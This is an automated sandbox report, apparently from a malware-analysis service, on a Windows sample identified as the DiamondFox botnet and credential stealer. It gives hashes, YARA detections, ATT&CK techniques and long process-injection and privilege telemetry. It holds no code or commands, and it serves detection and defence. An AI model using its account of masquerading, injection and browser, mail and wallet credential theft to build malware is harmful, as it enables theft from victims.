diamondfox | 958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7

Analysis

max time kernel
103s
max time network
124s
platform
windows7_x64
resource
win7v20201028
submitted
04/02/2021, 10:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe
Size

392KB
MD5

58e3dd75dabaa2d6e81118b2f7ca854a
SHA1

ccab657f017855ddf2e0ed0341f39f1036ce8523
SHA256

958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7
SHA512

7fa5ff90c155e6370545d6226993411e2bbcca2e33f375fde72bea8437139c5f4e5c9fe4ccd18a5d5906817567b6153b1c5d4480e56a2b9d7263f5e1e657e13e

Score

10^/10

diamondfox botnet discovery ransomware spyware stealer

Malware Config

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 1 IoCs

Detects DiamondFox payload in file/memory.

resource	yara_rule
behavioral1/memory/296-4-0x0000000000400000-0x0000000002652000-memory.dmp	diamondfox

NirSoft MailPassView 2 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/1696-36-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView
behavioral1/memory/1696-40-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1656-22-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView
behavioral1/memory/1656-23-0x00000000004466F4-mapping.dmp	WebBrowserPassView
behavioral1/memory/1656-26-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView

Nirsoft 8 IoCs

resource	yara_rule
behavioral1/memory/1656-22-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/1656-23-0x00000000004466F4-mapping.dmp	Nirsoft
behavioral1/memory/1656-26-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/1696-36-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft
behavioral1/memory/1696-40-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft
behavioral1/memory/1692-41-0x0000000000400000-0x0000000000488000-memory.dmp	Nirsoft
behavioral1/memory/1692-42-0x000000000040190A-mapping.dmp	Nirsoft
behavioral1/memory/1692-45-0x0000000000400000-0x0000000000488000-memory.dmp	Nirsoft

Executes dropped EXE 14 IoCs

pid	Process
1060	MicrosoftEdgeCPS.exe
1656	MicrosoftEdgeCPS.exe
1956	MicrosoftEdgeCPS.exe
1344	MicrosoftEdgeCPS.exe
1696	MicrosoftEdgeCPS.exe
1692	MicrosoftEdgeCPS.exe
1064	MicrosoftEdgeCPS.exe
1448	MicrosoftEdgeCPS.exe
328	MicrosoftEdgeCPS.exe
1668	MicrosoftEdgeCPS.exe
2036	MicrosoftEdgeCPS.exe
960	MicrosoftEdgeCPS.exe
1112	setup.exe
1836	setup.exe

Loads dropped DLL 12 IoCs

pid	Process
296	958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe
296	958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe
1060	MicrosoftEdgeCPS.exe
1992	WerFault.exe
1992	WerFault.exe
1992	WerFault.exe
1852	WerFault.exe
1852	WerFault.exe
1852	WerFault.exe
1852	WerFault.exe
976	86.0.4240.111_chrome_installer.exe
1112	setup.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

JavaScript code in executable 5 IoCs

resource	yara_rule
behavioral1/files/0x00030000000130ee-98.dat	js
behavioral1/files/0x00030000000130ee-100.dat	js
behavioral1/files/0x00030000000130ee-102.dat	js
behavioral1/files/0x00030000000130ee-101.dat	js
behavioral1/files/0x00030000000130ee-104.dat	js

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082

Suspicious use of SetThreadContext 12 IoCs

description	pid	Process	procid_target
PID 1060 set thread context of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 set thread context of 1956	1060	MicrosoftEdgeCPS.exe	47
PID 1060 set thread context of 1344	1060	MicrosoftEdgeCPS.exe	48
PID 1060 set thread context of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 set thread context of 1692	1060	MicrosoftEdgeCPS.exe	50
PID 1060 set thread context of 1064	1060	MicrosoftEdgeCPS.exe	51
PID 1060 set thread context of 1448	1060	MicrosoftEdgeCPS.exe	52
PID 1060 set thread context of 328	1060	MicrosoftEdgeCPS.exe	53
PID 1060 set thread context of 1668	1060	MicrosoftEdgeCPS.exe	54
PID 1060 set thread context of 2036	1060	MicrosoftEdgeCPS.exe	55
PID 1448 set thread context of 976	1448	MicrosoftEdgeCPS.exe	56
PID 1060 set thread context of 960	1060	MicrosoftEdgeCPS.exe	58

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\86.0.4240.111\CR_586B5.tmp\CHROME.PACKED.7Z	86.0.4240.111_chrome_installer.exe
File created	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\86.0.4240.111\CR_586B5.tmp\SETUP.EX_	86.0.4240.111_chrome_installer.exe
File created	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\86.0.4240.111\CR_586B5.tmp\setup.exe	86.0.4240.111_chrome_installer.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1992	1448	WerFault.exe	52
1852	2036	WerFault.exe	55

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1060	MicrosoftEdgeCPS.exe
1656	MicrosoftEdgeCPS.exe
1656	MicrosoftEdgeCPS.exe
1692	MicrosoftEdgeCPS.exe
1692	MicrosoftEdgeCPS.exe
1692	MicrosoftEdgeCPS.exe
1692	MicrosoftEdgeCPS.exe
2036	MicrosoftEdgeCPS.exe
1992	WerFault.exe
1992	WerFault.exe
1992	WerFault.exe
1992	WerFault.exe
1992	WerFault.exe
1060	MicrosoftEdgeCPS.exe
1852	WerFault.exe
1852	WerFault.exe
1852	WerFault.exe
1852	WerFault.exe
1852	WerFault.exe
1196	chrome.exe

Suspicious use of AdjustPrivilegeToken 365 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	332	wmic.exe
Token: SeSecurityPrivilege	332	wmic.exe
Token: SeTakeOwnershipPrivilege	332	wmic.exe
Token: SeLoadDriverPrivilege	332	wmic.exe
Token: SeSystemProfilePrivilege	332	wmic.exe
Token: SeSystemtimePrivilege	332	wmic.exe
Token: SeProfSingleProcessPrivilege	332	wmic.exe
Token: SeIncBasePriorityPrivilege	332	wmic.exe
Token: SeCreatePagefilePrivilege	332	wmic.exe
Token: SeBackupPrivilege	332	wmic.exe
Token: SeRestorePrivilege	332	wmic.exe
Token: SeShutdownPrivilege	332	wmic.exe
Token: SeDebugPrivilege	332	wmic.exe
Token: SeSystemEnvironmentPrivilege	332	wmic.exe
Token: SeRemoteShutdownPrivilege	332	wmic.exe
Token: SeUndockPrivilege	332	wmic.exe
Token: SeManageVolumePrivilege	332	wmic.exe
Token: 33	332	wmic.exe
Token: 34	332	wmic.exe
Token: 35	332	wmic.exe
Token: SeIncreaseQuotaPrivilege	332	wmic.exe
Token: SeSecurityPrivilege	332	wmic.exe
Token: SeTakeOwnershipPrivilege	332	wmic.exe
Token: SeLoadDriverPrivilege	332	wmic.exe
Token: SeSystemProfilePrivilege	332	wmic.exe
Token: SeSystemtimePrivilege	332	wmic.exe
Token: SeProfSingleProcessPrivilege	332	wmic.exe
Token: SeIncBasePriorityPrivilege	332	wmic.exe
Token: SeCreatePagefilePrivilege	332	wmic.exe
Token: SeBackupPrivilege	332	wmic.exe
Token: SeRestorePrivilege	332	wmic.exe
Token: SeShutdownPrivilege	332	wmic.exe
Token: SeDebugPrivilege	332	wmic.exe
Token: SeSystemEnvironmentPrivilege	332	wmic.exe
Token: SeRemoteShutdownPrivilege	332	wmic.exe
Token: SeUndockPrivilege	332	wmic.exe
Token: SeManageVolumePrivilege	332	wmic.exe
Token: 33	332	wmic.exe
Token: 34	332	wmic.exe
Token: 35	332	wmic.exe
Token: SeIncreaseQuotaPrivilege	344	wmic.exe
Token: SeSecurityPrivilege	344	wmic.exe
Token: SeTakeOwnershipPrivilege	344	wmic.exe
Token: SeLoadDriverPrivilege	344	wmic.exe
Token: SeSystemProfilePrivilege	344	wmic.exe
Token: SeSystemtimePrivilege	344	wmic.exe
Token: SeProfSingleProcessPrivilege	344	wmic.exe
Token: SeIncBasePriorityPrivilege	344	wmic.exe
Token: SeCreatePagefilePrivilege	344	wmic.exe
Token: SeBackupPrivilege	344	wmic.exe
Token: SeRestorePrivilege	344	wmic.exe
Token: SeShutdownPrivilege	344	wmic.exe
Token: SeDebugPrivilege	344	wmic.exe
Token: SeSystemEnvironmentPrivilege	344	wmic.exe
Token: SeRemoteShutdownPrivilege	344	wmic.exe
Token: SeUndockPrivilege	344	wmic.exe
Token: SeManageVolumePrivilege	344	wmic.exe
Token: 33	344	wmic.exe
Token: 34	344	wmic.exe
Token: 35	344	wmic.exe
Token: SeIncreaseQuotaPrivilege	344	wmic.exe
Token: SeSecurityPrivilege	344	wmic.exe
Token: SeTakeOwnershipPrivilege	344	wmic.exe
Token: SeLoadDriverPrivilege	344	wmic.exe
Token: SeSystemProfilePrivilege	344	wmic.exe
Token: SeSystemtimePrivilege	344	wmic.exe
Token: SeProfSingleProcessPrivilege	344	wmic.exe
Token: SeIncBasePriorityPrivilege	344	wmic.exe
Token: SeCreatePagefilePrivilege	344	wmic.exe
Token: SeBackupPrivilege	344	wmic.exe
Token: SeRestorePrivilege	344	wmic.exe
Token: SeShutdownPrivilege	344	wmic.exe
Token: SeDebugPrivilege	344	wmic.exe
Token: SeSystemEnvironmentPrivilege	344	wmic.exe
Token: SeRemoteShutdownPrivilege	344	wmic.exe
Token: SeUndockPrivilege	344	wmic.exe
Token: SeManageVolumePrivilege	344	wmic.exe
Token: 33	344	wmic.exe
Token: 34	344	wmic.exe
Token: 35	344	wmic.exe
Token: SeIncreaseQuotaPrivilege	560	wmic.exe
Token: SeSecurityPrivilege	560	wmic.exe
Token: SeTakeOwnershipPrivilege	560	wmic.exe
Token: SeLoadDriverPrivilege	560	wmic.exe
Token: SeSystemProfilePrivilege	560	wmic.exe
Token: SeSystemtimePrivilege	560	wmic.exe
Token: SeProfSingleProcessPrivilege	560	wmic.exe
Token: SeIncBasePriorityPrivilege	560	wmic.exe
Token: SeCreatePagefilePrivilege	560	wmic.exe
Token: SeBackupPrivilege	560	wmic.exe
Token: SeRestorePrivilege	560	wmic.exe
Token: SeShutdownPrivilege	560	wmic.exe
Token: SeDebugPrivilege	560	wmic.exe
Token: SeSystemEnvironmentPrivilege	560	wmic.exe
Token: SeRemoteShutdownPrivilege	560	wmic.exe
Token: SeUndockPrivilege	560	wmic.exe
Token: SeManageVolumePrivilege	560	wmic.exe
Token: 33	560	wmic.exe
Token: 34	560	wmic.exe
Token: 35	560	wmic.exe
Token: SeIncreaseQuotaPrivilege	560	wmic.exe
Token: SeSecurityPrivilege	560	wmic.exe
Token: SeTakeOwnershipPrivilege	560	wmic.exe
Token: SeLoadDriverPrivilege	560	wmic.exe
Token: SeSystemProfilePrivilege	560	wmic.exe
Token: SeSystemtimePrivilege	560	wmic.exe
Token: SeProfSingleProcessPrivilege	560	wmic.exe
Token: SeIncBasePriorityPrivilege	560	wmic.exe
Token: SeCreatePagefilePrivilege	560	wmic.exe
Token: SeBackupPrivilege	560	wmic.exe
Token: SeRestorePrivilege	560	wmic.exe
Token: SeShutdownPrivilege	560	wmic.exe
Token: SeDebugPrivilege	560	wmic.exe
Token: SeSystemEnvironmentPrivilege	560	wmic.exe
Token: SeRemoteShutdownPrivilege	560	wmic.exe
Token: SeUndockPrivilege	560	wmic.exe
Token: SeManageVolumePrivilege	560	wmic.exe
Token: 33	560	wmic.exe
Token: 34	560	wmic.exe
Token: 35	560	wmic.exe
Token: SeIncreaseQuotaPrivilege	888	wmic.exe
Token: SeSecurityPrivilege	888	wmic.exe
Token: SeTakeOwnershipPrivilege	888	wmic.exe
Token: SeLoadDriverPrivilege	888	wmic.exe
Token: SeSystemProfilePrivilege	888	wmic.exe
Token: SeSystemtimePrivilege	888	wmic.exe
Token: SeProfSingleProcessPrivilege	888	wmic.exe
Token: SeIncBasePriorityPrivilege	888	wmic.exe
Token: SeCreatePagefilePrivilege	888	wmic.exe
Token: SeBackupPrivilege	888	wmic.exe
Token: SeRestorePrivilege	888	wmic.exe
Token: SeShutdownPrivilege	888	wmic.exe
Token: SeDebugPrivilege	888	wmic.exe
Token: SeSystemEnvironmentPrivilege	888	wmic.exe
Token: SeRemoteShutdownPrivilege	888	wmic.exe
Token: SeUndockPrivilege	888	wmic.exe
Token: SeManageVolumePrivilege	888	wmic.exe
Token: 33	888	wmic.exe
Token: 34	888	wmic.exe
Token: 35	888	wmic.exe
Token: SeIncreaseQuotaPrivilege	888	wmic.exe
Token: SeSecurityPrivilege	888	wmic.exe
Token: SeTakeOwnershipPrivilege	888	wmic.exe
Token: SeLoadDriverPrivilege	888	wmic.exe
Token: SeSystemProfilePrivilege	888	wmic.exe
Token: SeSystemtimePrivilege	888	wmic.exe
Token: SeProfSingleProcessPrivilege	888	wmic.exe
Token: SeIncBasePriorityPrivilege	888	wmic.exe
Token: SeCreatePagefilePrivilege	888	wmic.exe
Token: SeBackupPrivilege	888	wmic.exe
Token: SeRestorePrivilege	888	wmic.exe
Token: SeShutdownPrivilege	888	wmic.exe
Token: SeDebugPrivilege	888	wmic.exe
Token: SeSystemEnvironmentPrivilege	888	wmic.exe
Token: SeRemoteShutdownPrivilege	888	wmic.exe
Token: SeUndockPrivilege	888	wmic.exe
Token: SeManageVolumePrivilege	888	wmic.exe
Token: 33	888	wmic.exe
Token: 34	888	wmic.exe
Token: 35	888	wmic.exe
Token: SeIncreaseQuotaPrivilege	1596	wmic.exe
Token: SeSecurityPrivilege	1596	wmic.exe
Token: SeTakeOwnershipPrivilege	1596	wmic.exe
Token: SeLoadDriverPrivilege	1596	wmic.exe
Token: SeSystemProfilePrivilege	1596	wmic.exe
Token: SeSystemtimePrivilege	1596	wmic.exe
Token: SeProfSingleProcessPrivilege	1596	wmic.exe
Token: SeIncBasePriorityPrivilege	1596	wmic.exe
Token: SeCreatePagefilePrivilege	1596	wmic.exe
Token: SeBackupPrivilege	1596	wmic.exe
Token: SeRestorePrivilege	1596	wmic.exe
Token: SeShutdownPrivilege	1596	wmic.exe
Token: SeDebugPrivilege	1596	wmic.exe
Token: SeSystemEnvironmentPrivilege	1596	wmic.exe
Token: SeRemoteShutdownPrivilege	1596	wmic.exe
Token: SeUndockPrivilege	1596	wmic.exe
Token: SeManageVolumePrivilege	1596	wmic.exe
Token: 33	1596	wmic.exe
Token: 34	1596	wmic.exe
Token: 35	1596	wmic.exe
Token: SeIncreaseQuotaPrivilege	1596	wmic.exe
Token: SeSecurityPrivilege	1596	wmic.exe
Token: SeTakeOwnershipPrivilege	1596	wmic.exe
Token: SeLoadDriverPrivilege	1596	wmic.exe
Token: SeSystemProfilePrivilege	1596	wmic.exe
Token: SeSystemtimePrivilege	1596	wmic.exe
Token: SeProfSingleProcessPrivilege	1596	wmic.exe
Token: SeIncBasePriorityPrivilege	1596	wmic.exe
Token: SeCreatePagefilePrivilege	1596	wmic.exe
Token: SeBackupPrivilege	1596	wmic.exe
Token: SeRestorePrivilege	1596	wmic.exe
Token: SeShutdownPrivilege	1596	wmic.exe
Token: SeDebugPrivilege	1596	wmic.exe
Token: SeSystemEnvironmentPrivilege	1596	wmic.exe
Token: SeRemoteShutdownPrivilege	1596	wmic.exe
Token: SeUndockPrivilege	1596	wmic.exe
Token: SeManageVolumePrivilege	1596	wmic.exe
Token: 33	1596	wmic.exe
Token: 34	1596	wmic.exe
Token: 35	1596	wmic.exe
Token: SeIncreaseQuotaPrivilege	1444	wmic.exe
Token: SeSecurityPrivilege	1444	wmic.exe
Token: SeTakeOwnershipPrivilege	1444	wmic.exe
Token: SeLoadDriverPrivilege	1444	wmic.exe
Token: SeSystemProfilePrivilege	1444	wmic.exe
Token: SeSystemtimePrivilege	1444	wmic.exe
Token: SeProfSingleProcessPrivilege	1444	wmic.exe
Token: SeIncBasePriorityPrivilege	1444	wmic.exe
Token: SeCreatePagefilePrivilege	1444	wmic.exe
Token: SeBackupPrivilege	1444	wmic.exe
Token: SeRestorePrivilege	1444	wmic.exe
Token: SeShutdownPrivilege	1444	wmic.exe
Token: SeDebugPrivilege	1444	wmic.exe
Token: SeSystemEnvironmentPrivilege	1444	wmic.exe
Token: SeRemoteShutdownPrivilege	1444	wmic.exe
Token: SeUndockPrivilege	1444	wmic.exe
Token: SeManageVolumePrivilege	1444	wmic.exe
Token: 33	1444	wmic.exe
Token: 34	1444	wmic.exe
Token: 35	1444	wmic.exe
Token: SeIncreaseQuotaPrivilege	1444	wmic.exe
Token: SeSecurityPrivilege	1444	wmic.exe
Token: SeTakeOwnershipPrivilege	1444	wmic.exe
Token: SeLoadDriverPrivilege	1444	wmic.exe
Token: SeSystemProfilePrivilege	1444	wmic.exe
Token: SeSystemtimePrivilege	1444	wmic.exe
Token: SeProfSingleProcessPrivilege	1444	wmic.exe
Token: SeIncBasePriorityPrivilege	1444	wmic.exe
Token: SeCreatePagefilePrivilege	1444	wmic.exe
Token: SeBackupPrivilege	1444	wmic.exe
Token: SeRestorePrivilege	1444	wmic.exe
Token: SeShutdownPrivilege	1444	wmic.exe
Token: SeDebugPrivilege	1444	wmic.exe
Token: SeSystemEnvironmentPrivilege	1444	wmic.exe
Token: SeRemoteShutdownPrivilege	1444	wmic.exe
Token: SeUndockPrivilege	1444	wmic.exe
Token: SeManageVolumePrivilege	1444	wmic.exe
Token: 33	1444	wmic.exe
Token: 34	1444	wmic.exe
Token: 35	1444	wmic.exe
Token: SeIncreaseQuotaPrivilege	1668	wmic.exe
Token: SeSecurityPrivilege	1668	wmic.exe
Token: SeTakeOwnershipPrivilege	1668	wmic.exe
Token: SeLoadDriverPrivilege	1668	wmic.exe
Token: SeSystemProfilePrivilege	1668	wmic.exe
Token: SeSystemtimePrivilege	1668	wmic.exe
Token: SeProfSingleProcessPrivilege	1668	wmic.exe
Token: SeIncBasePriorityPrivilege	1668	wmic.exe
Token: SeCreatePagefilePrivilege	1668	wmic.exe
Token: SeBackupPrivilege	1668	wmic.exe
Token: SeRestorePrivilege	1668	wmic.exe
Token: SeShutdownPrivilege	1668	wmic.exe
Token: SeDebugPrivilege	1668	wmic.exe
Token: SeSystemEnvironmentPrivilege	1668	wmic.exe
Token: SeRemoteShutdownPrivilege	1668	wmic.exe
Token: SeUndockPrivilege	1668	wmic.exe
Token: SeManageVolumePrivilege	1668	wmic.exe
Token: 33	1668	wmic.exe
Token: 34	1668	wmic.exe
Token: 35	1668	wmic.exe
Token: SeIncreaseQuotaPrivilege	1668	wmic.exe
Token: SeSecurityPrivilege	1668	wmic.exe
Token: SeTakeOwnershipPrivilege	1668	wmic.exe
Token: SeLoadDriverPrivilege	1668	wmic.exe
Token: SeSystemProfilePrivilege	1668	wmic.exe
Token: SeSystemtimePrivilege	1668	wmic.exe
Token: SeProfSingleProcessPrivilege	1668	wmic.exe
Token: SeIncBasePriorityPrivilege	1668	wmic.exe
Token: SeCreatePagefilePrivilege	1668	wmic.exe
Token: SeBackupPrivilege	1668	wmic.exe
Token: SeRestorePrivilege	1668	wmic.exe
Token: SeShutdownPrivilege	1668	wmic.exe
Token: SeDebugPrivilege	1668	wmic.exe
Token: SeSystemEnvironmentPrivilege	1668	wmic.exe
Token: SeRemoteShutdownPrivilege	1668	wmic.exe
Token: SeUndockPrivilege	1668	wmic.exe
Token: SeManageVolumePrivilege	1668	wmic.exe
Token: 33	1668	wmic.exe
Token: 34	1668	wmic.exe
Token: 35	1668	wmic.exe
Token: SeDebugPrivilege	2036	MicrosoftEdgeCPS.exe
Token: SeDebugPrivilege	1992	WerFault.exe
Token: SeIncreaseQuotaPrivilege	296	wmic.exe
Token: SeSecurityPrivilege	296	wmic.exe
Token: SeTakeOwnershipPrivilege	296	wmic.exe
Token: SeLoadDriverPrivilege	296	wmic.exe
Token: SeSystemProfilePrivilege	296	wmic.exe
Token: SeSystemtimePrivilege	296	wmic.exe
Token: SeProfSingleProcessPrivilege	296	wmic.exe
Token: SeIncBasePriorityPrivilege	296	wmic.exe
Token: SeCreatePagefilePrivilege	296	wmic.exe
Token: SeBackupPrivilege	296	wmic.exe
Token: SeRestorePrivilege	296	wmic.exe
Token: SeShutdownPrivilege	296	wmic.exe
Token: SeDebugPrivilege	296	wmic.exe
Token: SeSystemEnvironmentPrivilege	296	wmic.exe
Token: SeRemoteShutdownPrivilege	296	wmic.exe
Token: SeUndockPrivilege	296	wmic.exe
Token: SeManageVolumePrivilege	296	wmic.exe
Token: 33	296	wmic.exe
Token: 34	296	wmic.exe
Token: 35	296	wmic.exe
Token: SeIncreaseQuotaPrivilege	296	wmic.exe
Token: SeSecurityPrivilege	296	wmic.exe
Token: SeTakeOwnershipPrivilege	296	wmic.exe
Token: SeLoadDriverPrivilege	296	wmic.exe
Token: SeSystemProfilePrivilege	296	wmic.exe
Token: SeSystemtimePrivilege	296	wmic.exe
Token: SeProfSingleProcessPrivilege	296	wmic.exe
Token: SeIncBasePriorityPrivilege	296	wmic.exe
Token: SeCreatePagefilePrivilege	296	wmic.exe
Token: SeBackupPrivilege	296	wmic.exe
Token: SeRestorePrivilege	296	wmic.exe
Token: SeShutdownPrivilege	296	wmic.exe
Token: SeDebugPrivilege	296	wmic.exe
Token: SeSystemEnvironmentPrivilege	296	wmic.exe
Token: SeRemoteShutdownPrivilege	296	wmic.exe
Token: SeUndockPrivilege	296	wmic.exe
Token: SeManageVolumePrivilege	296	wmic.exe
Token: 33	296	wmic.exe
Token: 34	296	wmic.exe
Token: 35	296	wmic.exe
Token: SeDebugPrivilege	1852	WerFault.exe
Token: SeIncreaseQuotaPrivilege	1292	wmic.exe
Token: SeSecurityPrivilege	1292	wmic.exe
Token: SeTakeOwnershipPrivilege	1292	wmic.exe
Token: SeLoadDriverPrivilege	1292	wmic.exe
Token: SeSystemProfilePrivilege	1292	wmic.exe
Token: SeSystemtimePrivilege	1292	wmic.exe
Token: SeProfSingleProcessPrivilege	1292	wmic.exe
Token: SeIncBasePriorityPrivilege	1292	wmic.exe
Token: SeCreatePagefilePrivilege	1292	wmic.exe
Token: SeBackupPrivilege	1292	wmic.exe
Token: SeRestorePrivilege	1292	wmic.exe
Token: SeShutdownPrivilege	1292	wmic.exe
Token: SeDebugPrivilege	1292	wmic.exe
Token: SeSystemEnvironmentPrivilege	1292	wmic.exe
Token: SeRemoteShutdownPrivilege	1292	wmic.exe
Token: SeUndockPrivilege	1292	wmic.exe
Token: SeManageVolumePrivilege	1292	wmic.exe
Token: 33	1292	wmic.exe
Token: 34	1292	wmic.exe
Token: 35	1292	wmic.exe
Token: SeIncreaseQuotaPrivilege	1292	wmic.exe
Token: SeSecurityPrivilege	1292	wmic.exe
Token: SeTakeOwnershipPrivilege	1292	wmic.exe
Token: SeLoadDriverPrivilege	1292	wmic.exe
Token: SeSystemProfilePrivilege	1292	wmic.exe
Token: SeSystemtimePrivilege	1292	wmic.exe
Token: SeProfSingleProcessPrivilege	1292	wmic.exe
Token: SeIncBasePriorityPrivilege	1292	wmic.exe
Token: SeCreatePagefilePrivilege	1292	wmic.exe
Token: SeBackupPrivilege	1292	wmic.exe
Token: SeRestorePrivilege	1292	wmic.exe
Token: SeShutdownPrivilege	1292	wmic.exe
Token: SeDebugPrivilege	1292	wmic.exe
Token: SeSystemEnvironmentPrivilege	1292	wmic.exe
Token: SeRemoteShutdownPrivilege	1292	wmic.exe
Token: SeUndockPrivilege	1292	wmic.exe
Token: SeManageVolumePrivilege	1292	wmic.exe
Token: 33	1292	wmic.exe
Token: 34	1292	wmic.exe
Token: 35	1292	wmic.exe
Token: 33	976	86.0.4240.111_chrome_installer.exe
Token: SeIncBasePriorityPrivilege	976	86.0.4240.111_chrome_installer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
772	chrome.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1956	MicrosoftEdgeCPS.exe
328	MicrosoftEdgeCPS.exe
1668	MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 329 IoCs

description	pid	Process	procid_target
PID 296 wrote to memory of 1060	296	958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe	29
PID 296 wrote to memory of 1060	296	958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe	29
PID 296 wrote to memory of 1060	296	958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe	29
PID 296 wrote to memory of 1060	296	958d8e1498f1b3db2c79a62f78da66520654243f25acb19025874066b92618c7.exe	29
PID 1060 wrote to memory of 332	1060	MicrosoftEdgeCPS.exe	31
PID 1060 wrote to memory of 332	1060	MicrosoftEdgeCPS.exe	31
PID 1060 wrote to memory of 332	1060	MicrosoftEdgeCPS.exe	31
PID 1060 wrote to memory of 332	1060	MicrosoftEdgeCPS.exe	31
PID 1060 wrote to memory of 344	1060	MicrosoftEdgeCPS.exe	33
PID 1060 wrote to memory of 344	1060	MicrosoftEdgeCPS.exe	33
PID 1060 wrote to memory of 344	1060	MicrosoftEdgeCPS.exe	33
PID 1060 wrote to memory of 344	1060	MicrosoftEdgeCPS.exe	33
PID 1060 wrote to memory of 560	1060	MicrosoftEdgeCPS.exe	36
PID 1060 wrote to memory of 560	1060	MicrosoftEdgeCPS.exe	36
PID 1060 wrote to memory of 560	1060	MicrosoftEdgeCPS.exe	36
PID 1060 wrote to memory of 560	1060	MicrosoftEdgeCPS.exe	36
PID 1060 wrote to memory of 888	1060	MicrosoftEdgeCPS.exe	38
PID 1060 wrote to memory of 888	1060	MicrosoftEdgeCPS.exe	38
PID 1060 wrote to memory of 888	1060	MicrosoftEdgeCPS.exe	38
PID 1060 wrote to memory of 888	1060	MicrosoftEdgeCPS.exe	38
PID 1060 wrote to memory of 1596	1060	MicrosoftEdgeCPS.exe	40
PID 1060 wrote to memory of 1596	1060	MicrosoftEdgeCPS.exe	40
PID 1060 wrote to memory of 1596	1060	MicrosoftEdgeCPS.exe	40
PID 1060 wrote to memory of 1596	1060	MicrosoftEdgeCPS.exe	40
PID 1060 wrote to memory of 1444	1060	MicrosoftEdgeCPS.exe	42
PID 1060 wrote to memory of 1444	1060	MicrosoftEdgeCPS.exe	42
PID 1060 wrote to memory of 1444	1060	MicrosoftEdgeCPS.exe	42
PID 1060 wrote to memory of 1444	1060	MicrosoftEdgeCPS.exe	42
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	44
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	44
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	44
PID 1060 wrote to memory of 1668	1060	MicrosoftEdgeCPS.exe	44
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1656	1060	MicrosoftEdgeCPS.exe	46
PID 1060 wrote to memory of 1956	1060	MicrosoftEdgeCPS.exe	47
PID 1060 wrote to memory of 1956	1060	MicrosoftEdgeCPS.exe	47
PID 1060 wrote to memory of 1956	1060	MicrosoftEdgeCPS.exe	47
PID 1060 wrote to memory of 1956	1060	MicrosoftEdgeCPS.exe	47
PID 1060 wrote to memory of 1956	1060	MicrosoftEdgeCPS.exe	47
PID 1060 wrote to memory of 1956	1060	MicrosoftEdgeCPS.exe	47
PID 1060 wrote to memory of 1956	1060	MicrosoftEdgeCPS.exe	47
PID 1060 wrote to memory of 1956	1060	MicrosoftEdgeCPS.exe	47
PID 1060 wrote to memory of 1344	1060	MicrosoftEdgeCPS.exe	48
PID 1060 wrote to memory of 1344	1060	MicrosoftEdgeCPS.exe	48
PID 1060 wrote to memory of 1344	1060	MicrosoftEdgeCPS.exe	48
PID 1060 wrote to memory of 1344	1060	MicrosoftEdgeCPS.exe	48
PID 1060 wrote to memory of 1344	1060	MicrosoftEdgeCPS.exe	48
PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
PID 1060 wrote to memory of 1696	1060	MicrosoftEdgeCPS.exe	49
